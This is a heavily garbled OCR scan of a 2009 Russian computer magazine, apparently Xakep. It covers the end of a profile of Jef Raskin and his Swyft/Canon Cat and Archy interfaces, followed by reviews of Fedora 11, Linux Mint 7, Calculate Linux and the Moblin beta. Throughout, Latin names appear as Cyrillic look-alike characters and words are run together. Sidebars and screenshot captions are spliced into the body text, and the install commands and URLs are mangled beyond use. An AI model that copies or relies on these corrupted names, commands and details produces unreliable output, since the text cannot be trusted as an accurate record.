Наш герой был уверен, что практически все существующие пользо- 
вательские интерфейсы — это самое настоящее зло. Есть юзер и есть 
данные, а все остальное — от лукавого. Идея приложений, по мнению 
Раскина, удобна разве что самим программерам, но никакие конечному 
пользователю, который вынужден со всем этим общаться, запоминая 
совершенно разные команды, принципы работы и прочиеособенности. 
Объясняя своюточкузрения, Джеф нередко проводил параллели сфизи- 
ческими возможностями человека. Работая с неудобной или неграмотно 
спроектированной машиной (например, тренажером], человекощущает 
дискомфорт и понимает, что емутяжело и неудобно. Ментальные возмож- 
ности ограничены точнотакже, каки возможности физические, ноужас в 
том, что, работая с неправильно спроектированным интерфейсом, пользо- 
ватель не осознает и не чувствует неудобства. Зато концентрация внима- 
ния и производительность стремительно падают — мозг зачастую просто 
неуспевает реагировать и обрабатыватьтакое количество информации. 
Об этой более чем серьезной проблеме Раскин задумался одним из пер- 
вых. Но какзаставить разработчиков перестать ломать юзерам мозг? 
Решение проблемы Джеф видел довольно специфическое. Он предлагал 
отказаться от кучи разномастных приложений (а заодно и от 6111 вообще), 
воюющих за внимание пользователя и порождающих хаос, — и создать 
единую рабочую среду, которая всегда ведет себя одинаково, отвечает 
на одни и те же сочетания клавиш и команды. Раскин считал нужным 
упразднить и «мышь». В результате суммирования всего этого на свети 
появится 5ѴѴѴРТ. 

6111 уЗѴѴУРТ’а не было, он работал только стекстом, являя собой текс- 
товый монолит, где файлы отделялисьдруготдруга лишь специальным 
символом-разделителем. По сути, файловая систематоже отсутствовала. 
Точнотакже убрали и команду сохранения, в 5ѴѴѴРТ она была не нужна 
— состояние системы сэйвилось на дискету само, по мере надобности, 
избавляя пользователя отлишней головной боли. Интересно, что при 
выключении и последующем включении компьютера, система первым 
делом восстанавливала «момент», на котором остановилась, и выводила 
его на экран. Из-за этого возникало впечатление, будто 5ѴѴѴРТ грузится 
моментально, и юзер могсразу начинать работу, вместо того чтобы сидеть, 
тупоуставившись на надпись «Загрузка». 

Навигация потекстовому массиву осуществлялась с помощью меха- 
низма БЕАР («прыжок»), — это практически аналог нынешнего поиска, 
например, в Рігеіох, и близкий родственник привычного для нас <СігІ+Р>. 
Чтобы перейти к определенному документу, достаточно было, удерживая 
ЕЕАР-клавишу, набрать символ «разделитель» и начать вбивать название 
нужного документа. Например, если бы документ назывался «Хакер», то по 
мере набора БЕАР перебросил бы тебя сначала к ближайшему документу 
на «х», потом на «ха», «хак» ит.д. В итоге, ты в любом случае добрался бы 
до искомого, притом довольно быстро. 

Также в текст можно было добавлять собственные пометки для упрощения 
навигации. То есть, обозначив важные вещи, к которым нужен быстрый 
доступ, какой-то фразой, символом, или набором букв вроде «ОѴѴЕРТУ», ты 
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в любой момент мог пробежаться по тексту поис- 
ком и найти все места, где стоит эта пометка. 
НоЭѴѴѴЕТ не был лишьтекстовым процессором, 
как можно было бы подумать. Он умел работать 
с модемом и различными службами (например, 
мог принимать почту], умел проверять орфогра- 
фию, поддерживал макросы и даже выполнял 
программы. 

Изначально 5ѴѴѴРТ был реализован как 
карта расширения для Арріе II, но Джеф хотел 
наладить выпуск полноценных компьютеров. 
Инвесторы Іпіогтабоп Аррііапсе не решились 
браться за это, посоветовав обратиться со 
своим бизнес-планом в японскую компанию 
Сапоп. Раскин последовал их совету, и Сапоп 
действительно согласились выпустить мо- 
ноблок на базе процессора Моіогоіа 68000 (тот 
же проц использовался в «Маках»), дав ему имя 
Сапоп СаР 

Ксожалению, несмотря на определенные сход- 
ства по части железа, куспеху«Мака»«Кошка» 
даже не приблизилась. Релиз машинки состо- 
ялся в 1 987 году, и публика восприняла ее как 
очередной навороченныйтекстовый процессор, 
совершенно не оценив заложенных в устройст- 
во идей. Спросом девайс не пользовался. 
Когромному разочарованию Раскина, выпуск 
«Кошек» прекратился уже через полгода (всего 
успели сделать и продать не более 20.000 уст- 
ройств), и до сих пор доподлинно не известно, 
почему в Сапоп приняли решение свернуть 
производство. Одни уверяют, что причина лежит 
на поверхности — «Кошки» плохо продавались. 
Однако другие полагают, что в Сапоп серьезно 
заинтересовались разработкой Раскина, из-за 
чего внутри компании началисьтрения, которые 
руководство пресекло воттаким кардинальным 
образом. Еще одна, совсемужпараноидаль- 
ная, теория гласит, что во всем опять виноват 
Стив Джобс, который в те годы уже покинул 
Арріе и работал в ІЧеХТ Сотриіегз. Сторонники 
теории заговора склоны считать, что Джобс, 
договариваясь с Сапоп о сотрудничестве 
(которое действительно имело место], выдвинул 
условие — попросил избавиться от Раскина с его 
«Кошкой». Последнее, конечно, видится крайне 
сомнительным. 

Но, какбы то ни было, ясно одно — «Кошка» 
сдохла и отнюдь не по вине Джефа Раскина. В 



пользу Джефа, например, говорятдва занима- 
тельных факта — согласно непроверенным, но 
весьма правдоподобным слухам, дошедшим 
из компании Сапоп, в последующие годы ни на 
одну из проданных машинтаки не поступило 
ни одной жалобы, а сама компания продолжала 
пользоваться «Кошками» вплотьдо начала 
2000-х годов! 

ТНЕ, АКСНІ И АЗА РАСКИН 

В скором времени после провала своей не- 
обычной машинки — в 1989 году — Раскин был 
вынужден закрыть Іпіогтаііоп Аррііапсе, но 
отказываться отсвоих идей и пересматривать 
свои взгляды по-прежнему не собирался. 

В 90-е, когда компьютеры зашагали 
семимильными шагами по всей планете, 
Джеф продолжил пропагандировать свое 
виденье пользовательских интерфейсов, 
уже будучи независимым специалистом и 
консультантом. Он писал статьи, участвовал 
вжизни ВАУСНІ (Вау-Агеа Сотриіег-Нитап 
Іпіегіасе] — профессиональной органи- 
зации, занимающейся интерфейсами 
«человек-машина», и консультировал даже 
производителей, не имеющих отношения 
к ІТ (например, ему до вел ось сотрудничать 
сВМѴѴ). Плюс, не будем забывать о том, 
сколько у Джефа было некомпьютерных 
увлечений, а он никогда не отодвигал их 
на второй план, умудряясь успевать все и 
сразу. 

Апогеем его изысканий и размышлений о про- 
блеме общения человека с компьютером стала 
книга «ТЬе Нитапе Іпіегіасе», вышедшая акку- 
рат к началу нового тысячелетия — в 2000 году. 
Она переведена на русский и у нас известна как 
«Интерфейс: новые направления в проектиро- 
вании компьютерных систем». Этоттруд Джефа 
Раскина под страхом смерти обязаны прочесть 
все разработчики юзер-интерфейсов, и тогда, 
не ровен час, они даже задумаются отом, что 
творят :]. 

Примерно одновременно с выходом книги 
появились зачатки наследника 5ѴѴУРТ — ин- 
терфейса ТЬе Нитапе Епѵігоптеп (сокращенно 
ТНЕ], чья концепция и была описана Джефом в 
«ТЬе Нитапе Іпіегіасе». Разработкой этой над- 
стройки над современными ОСями, в которой 



воплотилось все, над чем Раскин ломал голову 
последние 30 лет, занималась целая команда 
единомышленников (а таковые у Джефа, в 
общем-то, имелись всегда). Состоял в команде 
и сын Джефа — Аза Раскин — пошедший по сто- 
пам отца, то есть тоже ІТ-шникдо мозга костей. 

В основуТНЕ леглитеже принципы, на которых 
строилась Сапоп СаТ Никакого С III, только 
текст, ЕЕАР-клавиши и специальные команды, 
авто-сохранение, никакой «мыши» ит.д. Раскин 
по-прежнему оставался сторонником радикаль- 
ных мер, и за прошедшие годы окончательно 
уверился втом, что в 6111 нетничего хорошего, 
а «интуитивно-понятный интерфейс» — миф, и 
на самом деле словосочетание означает не «хо- 
роший» или «удобный», а лишь«привычный». 
Привыклиже мы, по мнению Раскина, ккривым, 
неправильным и глупым вещам. 

Конечно, он не могне понимать, что прогресс 
ушел оченьдалеко вперед, такчто вТНЕ появи- 
лось и кое-что новое, например 2111 — 2оотіпд 
ІІзег Іпіегіасе. Это своего рода «рабочий 
стол», точнее, его полностью переработанная 
Раскиным концепция — бесконечная масшта- 
бируемая плоскость, на которой расположены 
различные объекты, чье содержимое можно 
просматривать, просто увеличивая ихдо 100%. 
Уступка пользователям, которым в наши дни 
прямо-таки жизненно необходимо все визуали- 
зировать. 

Разработка на этот раз позиционировалась как 
некоммерческая, веласьдовольно неспешно, и 
проектбыл опенсорсовым. 

Незадолго до ухода Джефа Раскина из жизни, 

1 -го января 2005 года, все еще незаконченный 
ТНЕ был переименован в Агсбу. Агсбу — это 
акроним от РСНІ, основанного в то же время 
самим Джефом «Центра Раскина по созданию 
Гуманного (или «человечного») интерфейса» 
(Разкіп Сепіегіог Нитапе Іпіегіасез]. После 
переименования интерфейса у руля его разра- 
ботки окончательно встал Аза Раскин, который с 
тех пор и продолжает развивать дело отца. Сам 
же Джеф Раскин, какты уже знаешь, скончался 
26-го февраля того же 2005 года. 

Аза Раскин, о котором я обязательно расскажу 
тебе отдельно, действительно перенял у отца 
эстафету. Центр Раскина он реорганизовал в 
компанию НитапігесІ Іпс., а потом влился вмес- 
те с ней в ряды корпорации Могіііа, где сейчас 
возглавляет работу над пользовательским 
окружением. Стоитли говорить, что Аза помнит, 
чтит и использует исследования отца? 

Но идеи Джефа нашли свое воплощение не 
только в работе сына, — используют их и во 
многих современных системах. Конечно, 
максималистический подход «искоренить 61)1, 
отобрать мышь» не стал коммерчески успеш- 
ным, и перениматьего в полной мере никто 
неторопился, однако фундамент разработок 
Джефа, его философия и изначальный посыл 
нашли у разработчиков немалый отклик. Это 
подтверждает и тот фа кт, что различные элемен- 
ты его идей используются почти повсеместно, 
достаточно лишь присмотреться поближе, зная, 
что именно нужно искать, □с 
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ЛЕТНИЙ ФУРШЕТ 



Сезон сбора урожая Ыпих-дистрибутивов — МАЙ-ИЮНЬ 2009 ГОДА 



Всю зиму и начало весны разработчики ѲІМІІ/ипих-систем труди- 
лись, не покладая рук, чтобы в мае-июне представить на суд обще- 
ственности свои творения. Из великого многообразия дистрибу- 
тивов, вышедших в этот период, зс отобрал и протестировал самые 
яркие релизы. 



РЕР0КА11«І_Е0МЮА5» 

ОС: Вебога 11 

Сайт проекта: іесіогаргоіесі.огд 

Дата выхода: 9 июня 2009 
Лицензия: 6Рк 

Аппаратные платформы: і Я 8 6 . х86 64. РРС 

РРС64. 5390. 5390Х 



Системные требования: I пТеІ Репбит II 400 
МГц. 256/884 Мб РАМ [х86/х86 64). Л Гб [пол- 
ная установка 9 Гб]. 

Кегпеі 2.6.30. 6 ІіЬс 2.10.1. Шеѵ 141. НМ 0.5.12. 
Х.огд 1.6.1.901. 6ІМОМЕ2.26.0. КРЕ4.2.90. 
ОрепСНЛісе.Огд я. 1.1 

Поддержка: приблизительно до августа 2010 



Новая версия популярного дистрибутива 
вышла с некоторым опозданием, но кактоль- 
ко9июня в 18: 00 пом ос ко веко му времени 
на РТР-зеркалах Федоры открыли доступ к 
соответствующим папкам, по форумам про- 
несся клич, и все поклонники устремились 
за свежеиспеченными образами. В условиях 
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распространения дистрибутива ничего не 
изменилось. Для закачки доступны: Безкіюр 
Есііізоп, представляющий собой ЫѵеСО-вер- 
сию с рабочими столами ОЫОМЕилиКБЕ 
(отдельно І686 и х64 сборки] и традиционный 
вариант. Последний распространяется на 1 
БУБ или 6 СО дисках (для установки доста- 
точно взять ссіі ). Есть небольшой диск, поз- 
воляющий загрузиться и установить систему 
по сети. В версии Безкіюр ЕбШоп рабочий 
стол и программа установки доступны только 
наанглийском.а в ходе установки нельзя 
выбрать отдельные приложения; архив 
просто распаковывается на диск. Поэтому 
этот вариант больше подходит для тестиро- 
вания системы и ознакомления с новинкой. 
Несмотря на то, что в конце 2008 года 
ѴѴікіребіа объявила о своем намерении 
перейти с ПНЕІ_/ЕесІога на ІЛэипіи, и все из- 
за малого срока поддержки, разработчики 
твердо стоят на своем: релиз по-прежнему 
будет поддерживаться по схеме 2 релиза + 1 
месяц. Учитывая, что новая Еебога выходит 
приблизительно через 6-8 месяцев, срок 
получается небольшой. Появление І_Т5-вер- 
сии, каку БЬипІш, пока не нашло широкой 
поддержки у разработчиков. Хотя для до- 
машнего пользователя это не так существен- 
но. Те, кто использует предыдущие версии 
Еебога, могут обновить систему по Сети или 
при помощи установочного БѴБ-диска (по 
адресу бос5Тебогарго]есПогд расположена 
подробная инструкция сб-ирдгабе-х86. 

Ыті]. При этом нужно помнить, что прямое 
обновление через релиз невозможно (как 
и в других дистрибутивах], поэтому пользо- 
ватели Еебога 9 сначала должны обновить 
систему до 1 0, а затем уже до 1 1 . Хотя по мне 
в таком случае лучше сделать бэкап и поста- 
вить «с нуля». 

Новинок в Еебога достаточно много. Все 
пакеты пересобраны с дсс 4.4, который те- 
перьявляется компилятором поумолчанию. 
Наличие МіпОѴѴ позволяет компилировать 
программы для ѴѴіпсІоѵѵз (нужно поставить 
пакеты тіпд\л/32-*]. 

По умолчанию для системного раздела в ка- 
честве файловой системы предлагается ех1:4. 
Впервые поддержка ех1:4 появилась еще в 
Еебога 9, нотеперь, очевидно, разработчики 
ей полностью доверяют. Эта ФС имеет ряд 
преимуществ по сравнению страдиционны- 
ми ех1:2/3. Это и 48-битные номера блоков, и 
экстенты, адресующие последовательности 
блоков одним дескриптором, и выделение 
групп блоков. В итоге, использование ех!:4 
позволяет получить более высокий уровень 
производительности и надежности, а также 
хранить данные большего размера. Следует 
отметить, что в ех1:4 все же имеется сущест- 
венная проблема. Если в режиме отложен- 
ного распределения информации (Беіауеб 
аІІосаЛоп], при котором данные и мета-дан- 
ные могут оставаться незаписанными до 60 



секунд, произойдет сбой, данные будут уте- 
ряны. Были зафиксированы и зависания при 
удалении большого количества файлов. В 
2.6.30 уже включены необходимые патчи, но 
впечатление от новинки ситуация несколько 
испортила. Для загрузки системы раздел / 
Ьооі: нужно вынести отдельно и отформа- 
тировать в ех1:2/3; использование ех1:4 для 
этого раздела смысла не имеет. 

Все мы привыкли ктрадиционному мето- 
ду обновления. Новый пакет скачивается 
полностью, даже несмотря на то, что в старой 
версии часть файлов уже присутствует 
(например, доки]. В результате — лишний 
трафик, а при большом объеме обновле- 
ний — еще и затраченное время. Теперь 
эту проблему можно решить при помощи 
плагина Ргезію. В нем использован бинар- 
ный б ІІІ- механизм, скачивающий только 
различия пакетов. В результате — экономия 
до 60-80% трафика. Пока он не предлага- 
ется по умолчанию, поэтому не забываем 
его установить командой «уит твіаІТ 
уит -ргезію». Кроме того, обновлен РРМ до 
версии 4.7. Раз уже речь зашла об установке 
программ, то упомяну еще об одной новинке. 
Ранее РаскадеКМ: при попытке воспроизве- 
дения файла кодека, которого нет в системе, 
автоматом предлагал установить нужный 
пакет. Разработчики обещали расширить его 
возможности, что собственно и сделали. Те- 
перь он может автоматически устанавливать 
шрифты, необходимые для работы с конкрет- 
ными документами, и обработчики МІМЕ- 
типов. Правда, работает все это в ОЫОМЕ. В 
версии под КБЕ при щелчке на трЗ-файле 
пришлось вручную выбирать программу, ко- 
торая будет с ним работать (б и К), и указывать 
нужные пакеты. Проще поддержку аудио и 



видео кодеков установить так: 

# грт -Шіѵ ТШСр : / /бошііоасіі . 
гртТизіоп . огд/ Тгее/ Тесіога/ 
гртТизіоп- Тгее-геІеазе-гаѵТЬісіе . 
поагсЪ. . грт Ъббр : / /бошііоасіі . 
гртТизіоп . огд/попТгее/ Тесіога/ 
гртТизіоп-попТгее-геІеазе- 
гаѵгЪісІе . поагсЪ . грт 

# уит іпзСаІІ дзСгеатег-рІидіпз- 
Ъасі дзбгеатег-ріидіпз-идіу 

В новой версии существенно переработан 
процесс загрузки, и система действительно 
грузится за обещанные 20 секунд. Оборудо- 
вание установленная система определила 
корректно, не было и проблем при подключе- 
нии мобильного телефона через ВІиеІооіЬ. 
Локализовать систему не просто, а очень 
просто. При выборе в меню русского система 
определит, что не хватает пакетов, и сама 
предложит их установить. Как вариант, мож- 
но сделать это самостоятельно, используя 
установку групп пакетов: 

# уит дгоирІізС // выбираем нужную 
группу 

# уит дгоиріпзбаіі "Ъиззіап 
ЗиррогР " 

Аналогично устанавливается и другой рабо- 
чий стол (уит дгоиріпзіаіі «ХРС Е») . 

Все средства управления громкостью, наконец, 
перестроены на использование РиІзеАисІ іо, 
что позволило убрать тонну микшеров и регуля- 
торов, оставив лишь один. При необходимости 
пользователю будет выдано сообщение и 
показано окно настроек, в котором он может 
выбрать регулируемое устройство. 
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НОВЫЙ КУРКУЛЬ 



Перед сдачей номера в печать увидел свет Саісиіаііе Ііпих Безкіюр 9.7 КБЕ. 
Состав дистрибутива: Кегпеі 2.6.28.10, КЕ)Е 4.2.4, Х.Ог§ 7.4, ОрепОШсе 3.0.1. 
Основные изменения: 

• добавлена настройка звуковой карты; 

• добавлено распознавание компов и ноутбуков с двумя видеокартами; 

• в 2.5 раза ускорен процесс создания учетной записи в КБЕ; 

• добавлена поддержка установки системы на П5В РІазЬ с БѴТ) либо РГОБ . Для 
установки достаточно 2 Гб РІазЬ; 

• добавлена опция загрузки образа ІіѵеПѴБ в оперативную память. Режим 
будет работать только на компах с 2 Гб оперативной памяти и более. 

Вместо «саісиіаііе --ирсіаііе» теперь следует использовать: 

• Іаушап -5 && етег§е саісиіаііе 






• Іпіеі передала 
контроль над про- 
ектом МоЫіп в Ыпих 
Роипсіаііоп. 

• Об использовании 
МоЫіп на своих нет- 
букахуже заявили: 
Асе г, Н Р, А51І5, М5І 
и другие известные 
компании. 




НТТР://ѴѴѴѴѴѴ 



— 1 Г 

> Ііпкз 



йізІгоѴѴаІсЬ 

[ сіізігоѵѵаісб.сопп і 

— популярный сайт, 
который предо- 
ставляет новости, 
рейтинг популярнос- 
ти и другую общую 
информацию как 
о различных дистри- 
бутивах Ыпих, так 
и о свободных/откры- 
тых операционных 
системах ОрепЗоІагіз 
или хВ50. 



Программа установки Апасопба существенных измене- 
ний не претерпела. Сам процесс, как и ранее, разбит на 
два этапа. Вначале система копируется на диск, а после 
перезагрузки производятся донастройки при помощи 
«5е1ир Адепі». 

В комплекте также идетутилита «ЫѵеОВВ Сгеаіог», поз- 
воляющая создать загрузочную флешку. 

Примечательно, что не прошло и дня, как КРаскадеКіІ 
показывал наличие багфикса. А «уит ирбаіе» предложил 
обновить 61 пакет. 

Дистрибутив получился довольно хороший, хотя 
КОЕ’шники скорее всего останутся недовольными. В 
версии ОЫОМЕ новинок явно больше. 



ЫЫІІХМШТ7 6ЮРІА 

ОС: Ыпих Міпі 7 Оіогіа 
Сайт проекта: [іпихтіпі.сот 

Дата выхода: 26 мая 2009 
Лицензия: 6РЛ 

Аппаратные платформы: х86 1x86 64 вышел позже] 
Системные требования: Іпіеі Репііит или АМР СРЦ, 512 
Мб ОЗУ [для установки, работать можно и при 256 Мб ОЗУ] 
и 2.Р) Г б 

Кегпеі 2.6.28. ОІіЬс 2.9. Шеѵ141. НАЕ 0.5.12гс1. Х.огд 7.4. 
ОІХІОМЕ 2.26. ОрепОйісе.Огд 2.0.1 
Поддержка: до октября 2010 года 

В конце мая стал доступен седьмой релиз популярно- 



РУСИФИЦИРУЕМ РЕООКАІ.ШІІХ 
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интерфейс ювиы СДЕЛАН С УЧЕТОМ использования на нетбуках 



го дистрибутива Ыпих МіпЕ Наверное, это единственный проект, 
который сумел не только вырасти из еще одного «ІІЬипіш + кодеки» 
(подобных проектов в первое время было довольно много] в самосто- 
ятельное решение, но и добраться до 3-его места сайта бізігоѵѵаісіі. 
сот , практически догнав орепЗІІЗЕ. 

Появился Міпі в 2006 году; его основателем и бессменным 
руководителем является ирландец Сіетепі: БеіюЬѵге. Будучи 
большим спецом в Ыпих, он решил создать максимально удобный 
для пользователя дистрибутив. В Міпі это достигается несколь- 
кими путями : добавлены кодеки, упрощена установка программ, 
интегрированы утилиты собственной разработки, позволяющие 
настроить основные параметры даже чайнику. Правда, закрытые 
драйвера по-прежнему в комплекте не идут, — это противоречит 
принципам разработчиков. Также предложен альтернативный 
АРТ- метод установки приложений. Для этого используются не- 
большие по размеру (как правило, до 1 Кб] .тіпі-файлы, имеющие 
бинарный формат, в которых содержатся ссылки на источники. 
Такие файлы можно скачать с «ЗоЙѵѵаге Рогіаі» проекта и устано- 
вить программы при помощи контекстного меню. Крометого, пол- 
ностью поддерживается репозитарий ІЛэипіи. Начиная с версии 
5, разработчики придерживаются шестимесячного цикла выхода 
дистрибутива. Все версии Міпі традиционно имеютженские име- 
на, начало положено с Міпі 1 «Аба». 

Ыпих Міпі 7 основан на ІІЬипІи 9.04 «баипіу баска Іоре» и является 
ЕіѵеСБ/ОѴБ дистрибутивом, который может работать без установки 
на хард. После релиза была доступна только х86-версия (вариант 
под 64-битные системы анонсирован чуть позже, поддержка других 
аппаратных платформ не заявлена]. В качестве рабочей среды пред- 
ставлен лишьОІМОМЕ. Версии с другими оконными менеджерами 
в Міпі: развиваются, как правило, сторонними разработчиками и в 
настоящее время в версии 7 не представлены. 

Для загрузки предлагаются два варианта: 

• Маіп ЕсШіоп — поставляется в виде ЫѵеСО-образа, в котором при- 
сутствуют все кодеки, но интерфейстолько английский; 

• ІІпіѵегзаІ ЕсШіоп — ЕіѵеБѴБ (1 ,3 Гб), здесь собраны только свобод- 



ные компоненты, но есть возможность выбора русского языка. 

На мой взгляд, проще доработать Маіп, вытянув несколько мегов 
файлов локализации, чем убирать лишнее. Да и с музыкой это делать 
веселей. Кстати, сами разработчики рекомендуют использовать Маіп 
ЕсШіоп, как более стабильную. 

Меню позволяетзагрузиться в Біѵе-режиме или сразу начать 
установку. Загрузка системы происходит довольно быстро. Зелено- 
черный рабочий стол выглядит стильно, а в поставке имеется еще 
с десяток неплохих обоев. Чтобы упростить переход пользователя с 
ѴѴіпбоѵѵз, разработчики используют аналогичный принцип оформле- 
ния. На рабочем столе размещена ссылка СотріЛег. Вызвав утилиту 
ттЮезШор, можно добавить ряд других значков и включить Сотріг. 
Меню тіпШеп и выполнено в духе КБЕ4. Реализован удобный поиск 
программ; чтобы не искать нужную по меню, достаточно ввести ее имя 



ОДНИМЛЕОНИДАСОМ 

НЕОБОШЛОСЬ 



С выходом Ресіога 1 1 обновлены и дополнительные сборки Зріпз 
Пебогаргоіесцог^/ѵѵіЫ/КеІеазез/ІІ/Зріпз) . среди которых 
доступны: вариант сХРсе (подходит для слабых машин), Сатез, 
инженерная Ребога ЕІесГгопіс ЬаЪ, версия Ебисагіопз (содержит 
образовательные программы, ориентирована на студентов) и А05 
(АррНапсе Орегайп§ ЗузГет), предлагающий предустановленный 
образ дистрибутива. Последний предназначен для ОЕМ-поставщи- 
ков и содержит минимум пакетов. Кроме того, его можно использо- 
вать для запуска дистрибутива в виртуальных машинах. 
Параллельно обновился и Киззіап Ребога Кетіх 1 1 (ѵѵѵмѵ. 
гиззіапбебога.ги) — сборка Ребога с национальными особенностя- 
ми. Изначально локализован; в нем присутствуют все популярные 
кодеки и шрифты, имеется индикатор раскладки и многое другое. 
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РАБОЧИЙ СТОЛ ОБНОВЛЕННОГО РЕБОКА 



программе. Нажав Ѵізіі, попадаем на страницу рейтинга программы. 
Кнопка «Реаіигесі а рріісаііопз» вызывает одноименное окно, в кото- 
ром будут показаны наиболее популярные приложения. 

Для настройки правил пакетного фильтра в Міпі использован Сиіуѵ, 
имеющий три режима работы — предустановленный (здесьуказы- 
ваются приложения], простой и АбѵапсесІ. Кроме этого, заблокиро- 
вать доступ к домену можно при помощи тт1Ыаппу. Достаточно 
занести домен в список, и в /еіс/бозіз ему будет сопоставлен 
адрес 0.0. 0.0. 

Программа установки на хард переведена на русский; сам процесс 
инсталляции довольно прост. Чтобы локализовать установленную 
систему, нужно вызвать Супарііс, в окне поиска ввести «гиззіап» и 
отобрать нужные пакеты. Для локализации рабочего стола СІЧОМЕ 
достаточно установить Іапдиаде-раск-дпоте-ги. 



саісиіаіе-ііпих.ги . возможен вход через веб-интерфейс]. 
Поддерживается установка на ИОО и ІІ5В-Н00 с файловой систе- 
мой ехі4, ехіЗ, ехі2, РеізегРС, Ю5 или ХР5. Для загрузки через РТР/ 
НТТР предлагается ЫѵеСО. Через То ггепі доступен ЫѵеОѴО. Перед 
загрузкой рекомендую ознакомиться с документом «Структура РТР 
зеркала», чтобы не ошибиться с образом. Версию с КОЕ ищи в 
каталоге СЮ, ХРСЕ — СЮХ. Система изначально локализована. 
Загрузочное меню предлагает: 

• два варианта запуска системы (с X- сервером и без него); 

• произвести загрузку в ОЗУ (если доступно 2 и более гигабайт 
оперативки); 

• выполнить проверку памяти при помощи Метіезі. 

В меню выбираем язык (по умолчанию система грузится с англий- 
ским интерфейсом], раскладку, разрешение экрана. Загружается 
и работает система довольно быстро (особенно в ХРСЕ- варианте); 
рабочий стол выполнен традиционно и без излишеств. При нали- 
чии ОНСР-сервера сеть подхватывается автоматически, для ручной 
настройки следует вызывать утилиту ѴѴісб. 

В Ыѵе-системе присутствуетучетная запись диезі/диезі. Для 
получения гооГовских прав следует применять зи. Использование 
ІІ МА- ком пресс и и позволило не только сделать работу системы 
чуть быстрее, но и включить больше программ. В меню находим ло- 
кализованный ОрепОШсе.огд 3.0.1 , словарь СіаЮісІ, Рігеіюх 3.0.10 
(с РІазЬ -плагином], СІаѵѵзМаіІ, Рібдіп, ХСНаІ, СІМР 2.6.6, Аисіасіоиз, 
Мріауег и фронтэнд к нему дпоте-тріауег. Удобно, что все основ- 
ные кодеки присутствуют изначально. Переключатель раскладки 
выполнен несколько непривычно, — по <Сарз Роск>. 

Для установки системы используй утилиту саісиіаіе. Например, 
чтобы установить систему, обновляем установщик: 

# саІсиІаСе --ирсІаСе 

Подготавливаем разделы І ѵѵѵѵѵѵ.саісиіаіе-Ііпих.ги/Разбиение дис- 
ка ] и ставим, указав в качестве параметра корневой раздел, на 
который необходимо произвести установку: 



САІ.СШ.АТЕ І_ШЦХ РЕ5КТ0Р 9-6 ХРСЕ 



ОС: Саісиіаіе Ыпих Резкіор 9.6 ХРСЕ 
Сайт проекта: уѵуѵуѵ.саісиіаіе-ііпих.ги 
Дата выхода: 4 июня 2009 года 

Лицензия: СРД 

Аппаратные платформы: І686. х86 64 

Системные требования: Іпіеі Репііит Рго или АМР АіЫоп СРЦ. 
256/512 Мб РАМ и 3/6 Гб 

Кегпеі 2.6.28.10. СІіЬс2.8. Шеѵ141. НАР 0.5.11. Х.огд 7.4. ХРСЕ 4.6.1. 
ОрепОІІісе.Огд 3.0.1.3 

Саісиіаіе Ыпих — открытый проект по разработке дистрибутива, 
основанного на Сепіоо, задача которого — сделать Сепіоо проще 
и удобнее для установки и обновления на большом количестве 
систем. Поддерживается российской компанией Саісиіаіе Раск и 
разрабатывается для собственных нужд. 

В настоящее время доступны три версии системы: Саісиіаіе Ыпих 
Резкіор (СЮ) с рабочими столами КОЕ 4.2.3/ХРСЕ 4.6.1 и сервер- 
ный вариант Саісиіаіе 0 і гесРо гу Зегѵег (С 05]. Нумерация подобна 
ІІЬипІи (год. месяц]. 

Документации по дистрибутиву на сайте проекта немного, хотя необхо- 
димый минимум есть. Учитывая родство Саісиіаіе с Сепіюо, проблем с 
его освоением быть не должно. В основе дистрибутива лежитфирмен- 
ная утилита (точнее Регі-скрипт] Саісиіаію, при помощи которой можно 
собратьсвой вариантсистемы, установить на хард, создать загрузоч- 
ный 150, собрать и установить дополнения (пакеты стемами, играми). 
Развивается своя ветка портежей — Саісиіаіе Оѵегіау ( зѵп. 
саісиіаіе.ги/оѵегіау ]. Поддержка дистрибутива осуществля- 
ется сообществом, вопросы можно задавать в Зоодіе Згоир 
( дгоирз.доодіе.сот/дгоир/саісиіаіеііпих ) или на ІРС- канале ( ігс. 



# саІсиІаСе - -с!ізк= /5еѵ/ зс1а2 

По окончании копирования файлов дважды вводим пароль гооР По 
умолчанию форматирование производится в РеізегРЗ, а установка 
6ВІІВ — в МБР. При помощи дополнительных опций можно изме- 
нить поведение установщика. Если Саісиіаію будет единственной 
системой, идиск> 45 Гб (эту цифру можно изменить в самом с крип- 
те), то можно сделать просто: «саісиіаіе --сНзк=/беу/зба». После 
этого скрипт сам разобьет диск и установит систему. В дальнейшем 
обновление системы и установку приложений можно произвес- 
ти традиционным для Сепіюо способом — через запуск е те где. 

Но разработчики предлагают свой путь: достаточно скопировать 
150-образ с новой версией в каталог/изг/саІсиІаІю/зЬаге/Ііпих и 
скомандовать саісиіаіе. Система обновится, а все настройки будут 
сохранены. 

МОВЫЫ Ѵ2 ІІХ Ш5ЕК ЕХРЕШЕЫСЕ) ВЕТА 

ОС: МоЫіп ѵ2 ЦХ Веіа 

Сайт проекта: тоЫіп.огд 
Дата выхода: 19 мая 2009 
Лицензия: ОРГ 

Аппаратные платформы: ІпІеІАіот 1x86] 

Системные требования: нетбук 

МоЫіп — 0реп5оигсе-проект, задачей которого является разработ- 
ка Ыпих-платформы для мобильных устройств — нетбуки, неттопы, 
мобильные интернет-устройства (МЮ, МоЬіІе Іпіегпеі 0 еѵі се] и 
другие подобные девайсы. Разработка проводится под эгидой 
Іпіеі, поэтому в первую очередь проект ориентирован на поддержку 
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Добро пожаловать 

Уже готовы для установки? Ответив на несколько 
вопросов, вы можете установить содержимое живого 
Сй на этот компьютер, и вы сможете запускать 
систему быстрее и без живого СО 

Вопросы займут несколько минут. 

Пожалуйста, выберите язык для процесса установки. 
Этот же язык будет задействован в системе в 
качестве основного языка. 



Если у вас есть доступ в сеть интернет, 
прочтите информацию о проблемах, с которыми 
вы можете столкнуться, в сведениях о релизе. 

Сведения о релизе 



Шаг 1 из 7 

ПРОГРАММАУСТАНОВКИиыиХМШТНАЖЕСТКИЙДИСК 



| Выход 



т* Васк 



фРопѵагсІ 



устройств этой компании, хотя, возможно, МоЫіп будет работать и 
на х86-совместимых АМО Сеобе и ѴІА Ыапо/07. В настоящее время 
протестирован на: Асе г Азріге Опе, Азиз еееРС 901 , 1 000 Н, 0 е II М і п і 
9, М5І ѴѴіпб, І_епоѵо510,5атзипд N010, НРМІпі 1010 и 1120ЫР. При 
попытке запустить на настольной системе получим ошибку. Список 
задач, решаемых разработчиками, стандартен для таких систем — 
небольшое время загрузки ОС, нетребовательность каппаратным 
ресурсам и улучшенные средства энергосбережения. 

Основой МоЫіп послужил дистрибутив Ребога (какой именно — не 
сообщается, но пакеты подходят от 9]. В бета-версии обнародо- 
